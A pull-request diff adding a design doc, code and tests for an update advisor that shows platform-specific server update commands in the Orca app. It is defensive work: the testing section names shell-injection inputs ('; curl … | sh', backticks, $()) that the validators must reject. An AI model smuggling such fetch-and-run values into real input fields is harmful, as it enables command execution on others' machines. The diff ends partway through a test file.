### PR TITLE
Add remote server update advisor with detection and platform-specific guidance

### DIFF
--- a/docs/reference/remote-server-update-advisor.md
+++ b/docs/reference/remote-server-update-advisor.md
@@ -1,0 +1,486 @@
+# Remote Server Update Advisor
+
+## Decision
+
+Build a remote server update advisor before building any remote self-update
+executor.
+
+When the protocol compatibility gate blocks a paired Orca server, Orca should
+tell the user what is wrong, identify the server version and likely install
+shape when it can, and provide copyable platform-specific update guidance. The
+client must not download, install, restart, or run privileged commands on the
+remote machine in this design — not even over an SSH connection Orca already
+holds.
+
+The advisor covers **both block directions** reported by
+`evaluateRuntimeCompat` (`src/shared/protocol-compat.ts`):
+
+- `server-too-old`: show the remote update guidance described in this doc.
+- `client-too-old`: do not show server guidance. Route to the local update
+  flow — the desktop updater (`src/main/updater.ts`) on desktop, the app-store
+  update message on mobile.
+
+The first implementation adds optional server-side metadata now, but treats it
+as advisory and untrusted:
+
+```ts
+type RuntimeUpdateInfo = {
+  currentVersion?: string | null
+  latestVersion?: string | null
+  updateAvailable?: boolean | null
+  installKind?: RuntimeInstallKind
+  restartKind?: RuntimeRestartKind
+  serviceName?: string | null
+  installPath?: string | null
+  hostArch?: string | null // process.arch, e.g. 'x64' | 'arm64'
+  docsUrl?: string
+}
+
+type RuntimeInstallKind =
+  | 'mac-app'
+  | 'mac-homebrew'
+  | 'windows-installer'
+  | 'linux-appimage'
+  | 'linux-deb'
+  | 'linux-rpm'
+  | 'source'
+  | 'unknown'
+
+type RuntimeRestartKind = 'desktop' | 'foreground-serve' | 'systemd' | 'unknown'
+```
+
+The protocol compatibility gate remains the sole source of truth for whether a
+client can use the server. `latestVersion` and `updateAvailable` improve the
+prompt, but the app must render useful guidance when every field is absent.
+
+## Problem
+
+Remote Orca servers can be desktop apps, headless Linux AppImages, systemd
+services, Windows machines, deb/rpm package installs, or source builds. A
+client that only says "update the server" leaves users stranded at the exact
+moment the app is blocked. A client that attempts to update the server
+automatically risks running the wrong package manager, requiring `sudo`,
+breaking a service, or mutating a machine the user did not intend to touch.
+
+The right first step is to make the blocked state actionable without taking
+control of the remote host.
+
+### The cold-start constraint
+
+`updateInfo` only exists on servers new enough to ship it — and the servers
+being blocked are, by definition, old. The first generation of blocked servers
+will send **no** `updateInfo` at all. The advisor must therefore be fully
+functional from client-side data alone: the compat verdict, the already-shipped
+`hostPlatform` field on `RuntimeStatus` (`src/shared/runtime-types.ts` — itself
+optional; servers older than it land in the unknown-install guide), the
+paired endpoint's port, and client-side release metadata. `updateInfo` is an
+investment that pays off the *next* time a server falls behind. This also
+means steps 1–2 of the rollout should reach a release as early as possible,
+independent of the UI.
+
+## Goals
+
+- Show a clear "Update server required" prompt when protocol compatibility
+  blocks a paired server, reusing the existing entry points
+  (`HostSectionHeaderMenu.tsx`, `RuntimeEnvironmentsPane.tsx`).
+- Handle `client-too-old` by routing to the local update flow instead.
+- Show running and required protocol versions from the compat verdict.
+- Add optional update metadata to runtime status so future blocked states can
+  display server version, latest known version, install kind, and restart kind.
+- Provide copyable update commands or manual steps for the detected
+  platform/arch/install kind, and a useful fallback when unknown.
+- Support the SSH use case: the guidance is written to be pasted into the
+  user's own SSH session on the server. Orca does not run it.
+- Never block the compat gate or the status path on a network call.
+
+## Non-Goals
+
+- Do not run update commands on the remote server, via any transport —
+  including SSH connections Orca already holds for SSH workspaces.
+- Do not invoke `sudo`, package managers, installers, or service restarts.
+- Do not silently replace AppImages or desktop apps.
+- Do not require exact app-version equality between client and server
+  (protocol versions decide compatibility; app versions are display/advice).
+- Do not build a new stateful update service for the MVP.
+- Do not cover the SSH relay (`src/main/ssh/ssh-relay-deploy.ts`). The relay
+  is client-deployed into content-hash-versioned install dirs and self-heals on
+  version mismatch; it never needs this advisor. This doc is about paired
+  `orca serve` runtime servers.
+
+## Design
+
+### Trust model
+
+Every `updateInfo` field crosses a trust boundary: it is produced by a remote,
+possibly compromised, server and some of it is rendered into commands the user
+is invited to paste into a root shell. Rules:
+
+- Command blocks are rendered **only from client-owned templates**. Server
+  data may select a template or fill a validated placeholder; it is never
+  concatenated into a command as free text.
+- `serviceName`: must match `^orca[A-Za-z0-9@:._-]{0,75}\.service$` — the
+  mandatory `orca` prefix mirrors the trust rule cgroup-based systemd
+  detection already applies ("trusted only when the unit name starts with
+  `orca`"), so a compromised server cannot aim the rendered
+  `sudo systemctl restart` at an unrelated unit such as `sshd.service`, and
+  the leading alphanumeric means the value can never parse as a `systemctl`
+  flag. Otherwise it is discarded and the default `orca-serve.service` is
+  used.
+- `installPath`: must be absolute, end in `.AppImage`, and match
+  `^[A-Za-z0-9/._~+-]{1,256}$` (no spaces, quotes, or shell metacharacters) or
+  it is discarded and the documented default `/opt/orca/orca-linux.AppImage`
+  is used. The `.AppImage` suffix is load-bearing: the template `sudo mv`s
+  onto this path, so without it a malicious server could aim the overwrite at
+  an arbitrary root-owned file. Only the Linux AppImage template renders
+  `<install-path>`; typical Windows paths (drive letters, backslashes) fail
+  the regex anyway, and the Windows and macOS guides never embed a path in a
+  command.
+- `currentVersion` / `latestVersion`: must match
+  `^\d+\.\d+\.\d+(-[A-Za-z0-9.-]{1,40})?$` or they are not displayed.
+- `docsUrl`: parsed with `new URL()` and rendered only if the origin is
+  `https://github.com` and the **parsed** pathname is `/stablyai/orca` or
+  starts with `/stablyai/orca/`; otherwise the client's built-in links are
+  used. Checking the parsed pathname defeats `…/orca/../other-repo`, which a
+  raw string-prefix check passes and browsers normalize to another repo; the
+  trailing slash rules out sibling names like `stablyai/orca-foo`.
+- Port: taken from the client's own paired endpoint (an integer the client
+  already validated), never from server metadata. Behind a tunnel or proxy it
+  can differ from the server's listen port, so guides treat it as a hint.
+- Enum fields (`installKind`, `restartKind`): unrecognized values are treated
+  as `unknown`. `hostArch` is a free-form `process.arch` string: anything
+  other than a recognized arch (`x64`, `arm64`) is treated as absent.
+
+Values that fail validation are treated as absent — no error, no partial
+rendering.
+
+### Runtime status metadata
+
+Add optional `updateInfo` to `RuntimeStatus`, alongside the existing
+`runtimeProtocolVersion` / `capabilities` / `hostPlatform` fields, emitted from
+the same place status is stamped today (`src/main/runtime/orca-runtime.ts`).
+Older servers omit it; all client handling must be defensive.
+
+Detection is computed **once at server startup and cached** — never on the
+status hot path, which is polled. No package-manager subprocess may run per
+status request. Signals, in order of reliability:
+
+- `source`: `app.isPackaged` is false.
+- `linux-appimage`: `process.env.APPIMAGE` is set (the AppImage runtime sets
+  it); its value is `installPath`.
+- `windows-installer`: win32 and `process.execPath` under the NSIS install
+  location.
+- `mac-app`: darwin and `process.execPath` inside a `.app` bundle. Homebrew
+  cask installs copy the app into `/Applications`, so `mac-homebrew` is not
+  reliably distinguishable at runtime; when ambiguous, report `mac-app` (the
+  mac guide includes a Homebrew alternative). `mac-homebrew` stays in the enum
+  for explicit future configuration.
+- `linux-deb` / `linux-rpm`: non-AppImage packaged Linux install (execPath
+  under the package install dir); the deb-vs-rpm distinction may use a single
+  package-ownership check at startup. If the check is skipped or fails, report
+  `unknown`.
+- `restartKind: systemd`: `/proc/self/cgroup` names a `.service` unit under
+  `/system.slice/` — which also yields `serviceName`. A user-slice `.service`
+  cgroup is trusted only when the unit name starts with `orca`: children share
+  their parent's cgroup, so a manual `orca serve` inside a terminal or
+  multiplexer that itself runs as a user service (e.g.
+  `gnome-terminal-server.service`, a tmux user unit) would otherwise
+  false-positive. `INVOCATION_ID` alone is not trusted for the same
+  inheritance reason.
+- `restartKind: desktop` when serving from the full desktop app;
+  `foreground-serve` for `orca serve` with no systemd markers.
+
+Detection must prefer `unknown` over guessing, and prefer the broader kind
+over an unverified narrower one.
+
+`hostArch` is `process.arch`, needed because Linux assets differ by arch
+(`orca-linux.AppImage` vs `orca-linux-arm64.AppImage`). When absent (old
+server), the guide shows the x64 command with an arm64 note rather than
+guessing.
+
+### Client prompt surfaces
+
+Use the same advisor content everywhere a blocked remote server surfaces:
+
+- Runtime environment settings row (`RuntimeEnvironmentsPane.tsx`): the
+  strongest detail view — versions, detected install/restart kind, copyable
+  commands, docs links, and "Check again" (re-fetches status and re-evaluates
+  compatibility). "Check again" disables with a spinner while the recheck is
+  in flight; on success the blocked state clears back to the normal server
+  view, and on continued incompatibility an inline note confirms the server
+  is still out of date — never a click with no visible response.
+- Sidebar host menu (`HostSectionHeaderMenu.tsx`): keep the existing
+  "Update server required" action; deep-link to the settings row.
+- Blocked action dialog or toast: the compat gate already throws a
+  `RUNTIME_COMPAT_BLOCK_CODE`-tagged error
+  (`src/renderer/src/runtime/runtime-protocol-compat.ts`), so surfaces can
+  distinguish a version block from a transport failure and offer the same
+  deep-link.
+
+The advisor needs the blocked server's `RuntimeStatus` (`hostPlatform`,
+`updateInfo`) and the compat verdict even though the gate throws. Today the
+`RUNTIME_COMPAT_BLOCK_CODE` error carries only a message and code, discarding
+both: attach the verdict and `RuntimeStatus` to that error (e.g.
+`error.verdict`, `error.status`), and have "Check again" read status through
+the raw non-asserting RPC (`status.get` + `unwrapRuntimeRpcResult`) rather
+than `getRuntimeEnvironmentStatus`, so detection and versions can render
+while the environment stays blocked.
+
+Primary copy for `server-too-old`:
+
+> This Orca server needs an update before this client can use it.
+
+For `client-too-old`, keep the existing `describeRuntimeCompatBlock` message
+and offer the local updater action instead of any server guidance.
+
+When detection is available, include a line such as:
+
+> Detected: Linux AppImage, systemd service.
+
+The line comma-joins only the fields that resolved — e.g. "Detected: Linux
+AppImage" when `restartKind` is `unknown` — and is omitted entirely when both
+are unknown.
+
+Command blocks are copyable one block at a time. A command block is a
+suggestion for the user to run on the server (typically over their own SSH
+session), never a command Orca executes.
+
+The mobile client duplicates the compat evaluators (see the header comment in
+`protocol-compat.ts`); the guide matrix and copy should live in shared,
+dependency-free modules so mobile can mirror them.
+
+### Update guide matrix
+
+The client owns a guide matrix keyed by `hostPlatform`, `hostArch`,
+`installKind`, and `restartKind`. It ships with the client and needs no server
+deploy to change. Placeholders below (`<install-path>`, `<service-name>`,
+`<port>`) are filled from validated metadata or documented defaults
+(`/opt/orca/orca-linux.AppImage`, `orca-serve.service`, `6768` — matching
+`docs/reference/headless-linux-server.md`).
+
+All Linux download commands write to a sibling temp file and `mv` into place.
+Overwriting a running binary in place fails with `ETXTBSY`; `mv` within the
+same directory is an atomic rename that works while the old version runs. Do
+not stage in `/tmp` — a cross-filesystem `mv` degrades to a non-atomic copy
+into the destination path, which reintroduces the same failure.
+
+Linux AppImage (x64; use `orca-linux-arm64.AppImage` on arm64), download and
+swap:
+
+```bash
+sudo curl -fL https://github.com/stablyai/orca/releases/latest/download/orca-linux.AppImage \
+  -o <install-path>.new
+sudo chmod +x <install-path>.new
+sudo mv <install-path>.new <install-path>
+```
+
+Then restart:
+
+- systemd service: `sudo systemctl restart <service-name>`
+- foreground server: stop the running `orca serve` (Ctrl+C) and re-run your
+  usual serve command, e.g.
+  `LIBGL_ALWAYS_SOFTWARE=1 <install-path> serve --port <port>` plus any flags
+  you normally pass (such as `--pairing-address`). The advisor cannot know the
+  original command line, so it must not present an invented one as complete.
+
+Debian or Ubuntu package (assets are versioned: `orca-ide_<version>_amd64.deb`,
+or `_arm64.deb` on arm64; when release metadata supplies the exact asset URL
+the advisor prepends a matching `curl -fLO <asset-url>` line — here and for
+rpm — otherwise it links the releases page and the command uses the downloaded
+filename):
+
+```bash
+curl -fLO <asset-url>   # included when release metadata supplies the exact asset URL
+sudo apt install ./orca-ide_<version>_amd64.deb
+sudo systemctl restart <service-name>   # if running as a service
+```
+
+Fedora, RHEL, or compatible RPM package (`orca-ide-<version>.x86_64.rpm` /
+`.aarch64.rpm`):
+
+```bash
+curl -fLO <asset-url>   # included when release metadata supplies the exact asset URL
+sudo dnf install ./orca-ide-<version>.x86_64.rpm
+sudo systemctl restart <service-name>   # if running as a service
+```
+
+macOS desktop app:
+
+- Open Orca on that Mac and use the in-app update flow, or download the latest
+  `orca-macos-<arch>.dmg` from the releases page and replace the app.
+- If it was installed with Homebrew: `brew update && brew upgrade --cask
+  stablyai/orca/orca --greedy` (the cask is marked `auto_updates`, so plain
+  `brew upgrade` skips it; `--greedy` is required).
+- Restart the paired server after the app updates.
+
+Windows installer:
+
+- Open Orca on that Windows machine and use the in-app update flow, or
+  download and run
+  `https://github.com/stablyai/orca/releases/latest/download/orca-windows-setup.exe`.
+- Restart Orca (or the `orca serve` process) after installation.
+
+Source build: pull and rebuild; link the repo README.
+
+Unknown install:
+
+- Show the server platform and version if known.
+- Link `docs/reference/headless-linux-server.md` (on GitHub) and the releases
+  page.
+- Tell the user to update Orca on the server machine, restart the server, and
+  click "Check again".
+
+Exact deb/rpm filenames are versioned and must come from release metadata. If
+the client does not know the exact asset URL, it shows manual download
+guidance — it never invents a versioned filename. The unversioned
+`releases/latest/download/` URLs are stable only for the artifacts with
+unversioned names in `config/electron-builder.config.cjs`:
+`orca-linux.AppImage`, `orca-linux-arm64.AppImage`, `orca-macos-<arch>.dmg`,
+and `orca-windows-setup.exe`.
+
+### Release metadata
+
+No new update service. The desktop updater already publishes electron-updater
+manifests at a stable generic feed
+(`https://github.com/stablyai/orca/releases/latest/download` — see
+`src/main/updater.ts`): `latest-linux.yml`, `latest-mac.yml`, and `latest.yml`
+carry the latest version and asset filenames (the arm64 Linux release
+publishes its own `latest-linux-arm64.yml` variant). The advisor picks the
+manifest matching the *server's* platform/arch — not the client's — and reuses
+it for `latestVersion` / `updateAvailable` / exact asset names.
+
+Constraints, all inherited from known updater behavior:
+
+- The fetch is best-effort with a short timeout, done lazily when the advisor
+  is shown — never on the compat gate or status path. Failure means
+  `updateAvailable: null` and version-less guidance, not an error.
+- During release transitions, GitHub can expose a release before its assets
+  are reachable (see the walk-back logic in `updater.ts`). A fetched manifest
+  that names unreachable assets must degrade to the manual releases-page link,
+  not a broken copyable URL.
+- Results may be cached briefly on the client; staleness only affects advice
+  text, never compatibility.
+- If a server ever populates `latestVersion` / `updateAvailable` itself (e.g.
+  from its own updater check at startup), the client-fetched manifest wins:
+  server values are startup-stale hints and are never refreshed on the status
+  path.
+
+A stateful update service is only needed later for staged rollouts, kill
+switches, signed org policy, private channels, or fleet controls.
+
+## Rollout
+
+Ordered so each piece is independently safe; one PR works, but steps 1–2 may
+land earlier on their own (see the cold-start constraint):
+
+1. `RuntimeUpdateInfo` type in `src/shared/runtime-types.ts`; startup-cached
+   detection in main; emit `updateInfo` in runtime status
+   (`src/main/runtime/orca-runtime.ts`).
+2. Validation module for server-supplied fields (shared, dependency-free, unit
+   tested against injection inputs).
+3. Client-side guide matrix keyed by platform/arch/installKind/restartKind
+   with the fallback chain above (shared module for mobile reuse).
+4. Advisor UI in `RuntimeEnvironmentsPane.tsx` with both verdict directions:
+   `server-too-old` → guidance; `client-too-old` → local updater action.
+   "Check again" re-fetches status.
+5. Deep-links from `HostSectionHeaderMenu.tsx` ("Update server required") and
+   from `RUNTIME_COMPAT_BLOCK_CODE` error surfaces.
+6. Lazy release-metadata lookup (`latest-*.yml`) for `latestVersion`,
+   `updateAvailable`, and exact deb/rpm asset names.
+
+## Testing
+
+- Unit: detection mapping per platform fixture (APPIMAGE env, systemd cgroup
+  line — including a user-slice terminal-service cgroup that must not map to
+  `systemd`, `app.isPackaged`); every validation regex rejects
+  shell-metacharacter payloads (`; curl … | sh`, backticks, `$()`, newlines) and accepts the
+  documented defaults.
+- Unit: guide matrix snapshot per (platform, arch, installKind, restartKind)
+  key plus the all-fields-absent cold-start case — the doc's own commands are
+  the expected output.
+- Unit: verdict branching — `client-too-old` never renders server commands.
+- Extend `runtime-compatibility-test-fixture.ts` (today it only builds
+  compatible-status responses) with blocked-status fixtures with and without
+  `updateInfo`.
+- Manifest fetch: timeout and 404 paths yield `updateAvailable: null` and the
+  fallback guide; no path throws into the compat gate.
+
+## Alternatives Considered
+
+### Full remote self-update
+
+The client could download an asset on the remote machine, install it, and
+restart the server — including over an SSH connection Orca already holds for
+SSH workspaces.
+
+Rejected for the first version. Remote hosts vary too much: AppImages, systemd
+services, desktop apps, Windows installers, package managers, and source
+builds all have different permission and restart models. Running install
+commands remotely — even over Orca-owned SSH — creates a trust and audit
+problem, especially when `sudo` or service restarts are involved. It can be
+revisited as an explicit, capability-gated flow that asks for confirmation and
+shows exactly what will run.
+
+### Protocol-only error message
+
+Keep the current compatibility block and only say the server is too old.
+
+Rejected. Technically safe but not user-safe: the user still has to infer
+which machine is stale, how Orca was installed there, which asset to download,
+and whether a service restart is needed.
+
+### Client-only latest-version check
+
+Compare the remote protocol against the client's own app version or update
+feed, with no server metadata.
+
+Rejected as the only mechanism. The client's platform and install channel need
+not match the server's — a macOS client may pair with a Linux AppImage server.
+Client-side release data feeds the guides, but cannot describe the server's
+install shape.
+
+### Require a new Orca update server
+
+Rejected for the MVP. The advisor needs best-effort latest-version and asset
+metadata, which the existing electron-updater manifests already provide.
+
+### Exact version lockstep
+
+Require the server to run the exact client app version.
+
+Rejected. The protocol contract in `protocol-compat.ts` already defines
+compatibility, and exact equality would fail compatible pairs. App versions
+are for display and advice only.
+
+## Deferred / Open Questions
+
+### From 2026-07-06 review
+
+- **Blocked surface left undecided between dialog and toast** — Client prompt surfaces (P1, design-lens, confidence 75)
+
+  Dialog and toast are not interchangeable: a dialog is modal, traps focus,
+  and requires explicit dismissal, while a toast is transient, non-blocking,
+  and typically announced as a polite live region. The doc says "Blocked
+  action dialog or toast" without choosing, leaving the implementer to pick
+  focus-management and dismissal behavior on their own, risking inconsistent
+  UX if this surface and future blocked-action surfaces land differently.
+
+- **Advisor assumes the blocked user can run sudo on the server** — Goals / Client prompt surfaces (P2, product-lens, adversarial, confidence 75)
+
+  Every actionable path the advisor produces is a sudo command pasted into
+  the user's own SSH session, which assumes the blocked user is also the
+  server's administrator. On shared or team-administered servers the
+  copyable commands are un-runnable and the block stays exactly as
+  unactionable as the plain "update the server" message. A copyable "send
+  these steps to whoever administers this server" handoff would keep the
+  goal met for non-admin users.
+
+- **Server-metadata pipeline is sequenced first but delivers no value to currently-blocked servers** — Rollout / cold-start constraint (P2, product-lens, adversarial, confidence 75)
+
+  By the doc's own logic, rollout steps 1–2 (updateInfo schema, cached
+  detection, trust model) help no server blocked today — they pay off only
+  the next time a server falls behind, and that window's population is
+  unvalidated. The client-only advisor (steps 3–5) already delivers the full
+  user-facing unblock; consider shipping it as v1 and treating steps 1–2 and
+  6 as a fast-follow once advisor engagement is confirmed, or naming the
+  expected frequency of the payoff window to justify front-loading a
+  permanent wire contract.

--- a/src/main/ipc/register-core-handlers.test.ts
+++ b/src/main/ipc/register-core-handlers.test.ts
@@ -11,6 +11,7 @@ const {
   registerOpenCodeUsageHandlersMock,
   registerGitHubHandlersMock,
   registerFeedbackHandlersMock,
+  registerRuntimeReleaseManifestHandlersMock,
   registerStatsHandlersMock,
   registerMemoryHandlersMock,
   registerNotebookHandlersMock,
@@ -73,6 +74,7 @@ const {
   registerOpenCodeUsageHandlersMock: vi.fn(),
   registerGitHubHandlersMock: vi.fn(),
   registerFeedbackHandlersMock: vi.fn(),
+  registerRuntimeReleaseManifestHandlersMock: vi.fn(),
   registerStatsHandlersMock: vi.fn(),
   registerMemoryHandlersMock: vi.fn(),
   registerNotebookHandlersMock: vi.fn(),
@@ -170,6 +172,10 @@ vi.mock('./opencode-usage', () => ({
 
 vi.mock('./github', () => ({
   registerGitHubHandlers: registerGitHubHandlersMock
+}))
+
+vi.mock('./runtime-release-manifest', () => ({
+  registerRuntimeReleaseManifestHandlers: registerRuntimeReleaseManifestHandlersMock
 }))
 
 vi.mock('./feedback', () => ({
@@ -487,6 +493,7 @@ describe('registerCoreHandlers', () => {
     expect(registerGitLabHandlersMock).toHaveBeenCalledWith(store)
     expect(registerHostedReviewHandlersMock).toHaveBeenCalledWith(store, stats)
     expect(registerFeedbackHandlersMock).toHaveBeenCalled()
+    expect(registerRuntimeReleaseManifestHandlersMock).toHaveBeenCalled()
     expect(registerStatsHandlersMock).toHaveBeenCalledWith(stats)
     expect(registerMemoryHandlersMock).toHaveBeenCalledWith(store)
     expect(registerNotebookHandlersMock).toHaveBeenCalledWith(store)

--- a/src/main/ipc/register-core-handlers.ts
+++ b/src/main/ipc/register-core-handlers.ts
@@ -17,6 +17,7 @@ import { registerHostedReviewHandlers } from './hosted-review'
 import { registerLinearHandlers } from './linear'
 import { registerJiraHandlers } from './jira'
 import { registerFeedbackHandlers } from './feedback'
+import { registerRuntimeReleaseManifestHandlers } from './runtime-release-manifest'
 import { registerCrashReportingHandlers } from './crash-reporting'
 import { registerExportHandlers } from './export'
 import { registerStatsHandlers } from './stats'
@@ -138,6 +139,7 @@ export function registerCoreHandlers(
   registerLinearHandlers()
   registerJiraHandlers()
   registerFeedbackHandlers()
+  registerRuntimeReleaseManifestHandlers()
   if (crashReports) {
     registerCrashReportingHandlers(crashReports)
   }

--- a/src/main/ipc/runtime-release-manifest.test.ts
+++ b/src/main/ipc/runtime-release-manifest.test.ts
@@ -1,0 +1,56 @@
+import { describe, expect, it, vi } from 'vitest'
+
+const { fetchMock } = vi.hoisted(() => ({ fetchMock: vi.fn() }))
+
+vi.mock('electron', () => ({
+  ipcMain: { handle: vi.fn(), removeHandler: vi.fn() },
+  net: { fetch: (...args: unknown[]) => fetchMock(...args) }
+}))
+
+import { fetchRuntimeReleaseManifest } from './runtime-release-manifest'
+import { RELEASE_MANIFEST_BASE_URL } from '../../shared/runtime-release-manifest'
+
+function textResponse(ok: boolean, body: string): Response {
+  return { ok, status: ok ? 200 : 404, text: () => Promise.resolve(body) } as unknown as Response
+}
+
+describe('fetchRuntimeReleaseManifest', () => {
+  it('fetches the server-platform manifest and returns its yaml text', async () => {
+    fetchMock.mockReset()
+    fetchMock.mockResolvedValue(textResponse(true, 'version: 1.4.2\n'))
+
+    const result = await fetchRuntimeReleaseManifest({ platform: 'linux', arch: 'arm64' })
+
+    expect(result).toEqual({ ok: true, yaml: 'version: 1.4.2\n' })
+    expect(fetchMock).toHaveBeenCalledWith(
+      `${RELEASE_MANIFEST_BASE_URL}/latest-linux-arm64.yml`,
+      expect.objectContaining({ signal: expect.anything() })
+    )
+  })
+
+  it('returns ok:false for a platform with no published manifest without fetching', async () => {
+    fetchMock.mockReset()
+    expect(await fetchRuntimeReleaseManifest({ platform: 'freebsd' })).toEqual({ ok: false })
+    expect(fetchMock).not.toHaveBeenCalled()
+  })
+
+  it('returns ok:false on a 404 (release published before assets are reachable)', async () => {
+    fetchMock.mockReset()
+    fetchMock.mockResolvedValue(textResponse(false, 'Not Found'))
+    expect(await fetchRuntimeReleaseManifest({ platform: 'win32' })).toEqual({ ok: false })
+  })
+
+  it('returns ok:false when the fetch rejects (timeout/DNS)', async () => {
+    fetchMock.mockReset()
+    fetchMock.mockRejectedValue(new Error('The operation was aborted'))
+    expect(await fetchRuntimeReleaseManifest({ platform: 'darwin' })).toEqual({ ok: false })
+  })
+
+  it('returns ok:false when the response exceeds the byte cap', async () => {
+    fetchMock.mockReset()
+    fetchMock.mockResolvedValue(textResponse(true, 'x'.repeat(64 * 1024 + 1)))
+    expect(await fetchRuntimeReleaseManifest({ platform: 'linux', arch: 'x64' })).toEqual({
+      ok: false
+    })
+  })
+})

--- a/src/main/ipc/runtime-release-manifest.ts
+++ b/src/main/ipc/runtime-release-manifest.ts
@@ -1,0 +1,54 @@
+import { ipcMain, net } from 'electron'
+import { buildReleaseManifestUrl } from '../../shared/runtime-release-manifest'
+import type { RuntimeUpdateGuideArch } from '../../shared/runtime-update-guide-templates'
+
+// Why: the release-metadata lookup for the update advisor must run in main.
+// The renderer loads from a file:// origin in packaged builds, and GitHub's
+// `releases/latest/download` redirect lands on objects.githubusercontent.com,
+// which does not send permissive CORS headers — a renderer fetch() would fail.
+// Electron's `net` module runs in main and is not subject to CORS. The URL is
+// built entirely from a client-owned platform/arch mapping, so the renderer can
+// never steer this at an arbitrary host.
+
+const RELEASE_MANIFEST_TIMEOUT_MS = 4_000
+// electron-updater manifests are a few hundred bytes; cap the read so a
+// misrouted redirect to a large object can't be slurped into memory.
+const MAX_MANIFEST_BYTES = 64 * 1024
+
+export type RuntimeReleaseManifestFetchArgs = {
+  platform?: string
+  arch?: RuntimeUpdateGuideArch
+}
+
+export type RuntimeReleaseManifestFetchResult = { ok: true; yaml: string } | { ok: false }
+
+export async function fetchRuntimeReleaseManifest(
+  args: RuntimeReleaseManifestFetchArgs | undefined
+): Promise<RuntimeReleaseManifestFetchResult> {
+  const url = buildReleaseManifestUrl(args?.platform, args?.arch)
+  if (!url) {
+    return { ok: false }
+  }
+  try {
+    const res = await net.fetch(url, { signal: AbortSignal.timeout(RELEASE_MANIFEST_TIMEOUT_MS) })
+    if (!res.ok) {
+      return { ok: false }
+    }
+    const yaml = await res.text()
+    if (yaml.length > MAX_MANIFEST_BYTES) {
+      return { ok: false }
+    }
+    return { ok: true, yaml }
+  } catch {
+    // Best-effort: timeout, DNS failure, 404, and publish-window gaps all yield
+    // version-less guidance, never an error surfaced into the compat gate.
+    return { ok: false }
+  }
+}
+
+export function registerRuntimeReleaseManifestHandlers(): void {
+  ipcMain.removeHandler('runtimeReleaseManifest:fetch')
+  ipcMain.handle('runtimeReleaseManifest:fetch', (_event, args: RuntimeReleaseManifestFetchArgs) =>
+    fetchRuntimeReleaseManifest(args)
+  )
+}

--- a/src/main/runtime/orca-runtime.test.ts
+++ b/src/main/runtime/orca-runtime.test.ts
@@ -156,7 +156,11 @@ const electronMocks = vi.hoisted(() => {
     BrowserWindow: { fromId: vi.fn((_id: number): unknown => null) },
     webContents: { fromId: vi.fn((_id: number): unknown => null) },
     ipcMain,
-    app: { getPath: vi.fn(() => '/tmp') }
+    app: {
+      getPath: vi.fn(() => '/tmp'),
+      getVersion: vi.fn(() => '0.0.0-test'),
+      isPackaged: false
+    }
   }
 })
 

--- a/src/main/runtime/orca-runtime.ts
+++ b/src/main/runtime/orca-runtime.ts
@@ -377,6 +377,7 @@ import {
   type ClaudeAgentTeamsMode
 } from '../../shared/claude-agent-teams-tmux-compat'
 import { joinWorktreeRelativePath } from './runtime-relative-paths'
+import { getRuntimeUpdateInfo } from './runtime-install-detection'
 import { collectMemorySnapshot } from '../memory/collector'
 import { BrowserWindow, ipcMain } from 'electron'
 import type { AgentBrowserBridge } from '../browser/agent-browser-bridge'
@@ -2684,6 +2685,9 @@ export class OrcaRuntimeService {
     }
   ) {
     this.store = store
+    // Why: prime the install-detection cache at startup so the one-time
+    // package-ownership probe never runs on the polled status.get path.
+    void getRuntimeUpdateInfo()
     if (stats) {
       this.stats = stats
       this.agentDetector = new AgentDetector(stats)
@@ -3179,6 +3183,9 @@ export class OrcaRuntimeService {
       capabilities,
       hostPlatform: process.platform,
       terminalWindowsShell: this.store?.getSettings?.().terminalWindowsShell ?? null,
+      // Why: startup-cached; the advisor's install/restart hint must never run a
+      // subprocess or read /proc on this polled status path.
+      updateInfo: getRuntimeUpdateInfo(),
       protocolVersion: RUNTIME_PROTOCOL_VERSION,
       minCompatibleMobileVersion: MIN_COMPATIBLE_RUNTIME_CLIENT_VERSION
     }

--- a/src/main/runtime/runtime-install-detection.test.ts
+++ b/src/main/runtime/runtime-install-detection.test.ts
@@ -1,0 +1,187 @@
+import { describe, expect, it } from 'vitest'
+import {
+  detectRuntimeInstall,
+  gatherWindowsInstallRoots,
+  type RuntimeInstallDetectionInput
+} from './runtime-install-detection'
+
+function baseInput(
+  overrides: Partial<RuntimeInstallDetectionInput> = {}
+): RuntimeInstallDetectionInput {
+  return {
+    platform: 'linux',
+    arch: 'x64',
+    isPackaged: true,
+    execPath: '/opt/Orca/orca-ide',
+    appVersion: '1.2.3',
+    appImagePath: null,
+    isServeMode: true,
+    cgroupContent: null,
+    windowsInstallRoots: [],
+    linuxPackageOwner: null,
+    ...overrides
+  }
+}
+
+describe('detectRuntimeInstall install kind', () => {
+  it('reports source when the app is not packaged', () => {
+    const result = detectRuntimeInstall(baseInput({ isPackaged: false }))
+    expect(result.installKind).toBe('source')
+  })
+
+  it('reports linux-appimage and installPath when APPIMAGE is set', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'linux',
+        appImagePath: '/opt/orca/orca-linux.AppImage'
+      })
+    )
+    expect(result.installKind).toBe('linux-appimage')
+    expect(result.installPath).toBe('/opt/orca/orca-linux.AppImage')
+  })
+
+  it('reports windows-installer when execPath sits under an NSIS root', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'win32',
+        execPath: 'C:\\Users\\me\\AppData\\Local\\Programs\\orca\\Orca.exe',
+        windowsInstallRoots: ['C:\\Users\\me\\AppData\\Local\\Programs']
+      })
+    )
+    expect(result.installKind).toBe('windows-installer')
+    expect(result.installPath).toBeUndefined()
+  })
+
+  it('reports unknown on packaged win32 when execPath is outside every install root', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'win32',
+        execPath: 'D:\\portable\\orca\\Orca.exe',
+        windowsInstallRoots: ['C:\\Program Files']
+      })
+    )
+    expect(result.installKind).toBe('unknown')
+  })
+
+  it('reports mac-app for an execPath inside a .app bundle', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'darwin',
+        execPath: '/Applications/Orca.app/Contents/MacOS/Orca'
+      })
+    )
+    expect(result.installKind).toBe('mac-app')
+  })
+
+  it('never reports mac-homebrew and falls back to unknown outside a bundle', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'darwin',
+        execPath: '/usr/local/bin/orca'
+      })
+    )
+    expect(result.installKind).toBe('unknown')
+  })
+
+  it('reports linux-deb only when the startup package probe resolved it', () => {
+    const deb = detectRuntimeInstall(
+      baseInput({ platform: 'linux', linuxPackageOwner: 'linux-deb' })
+    )
+    expect(deb.installKind).toBe('linux-deb')
+
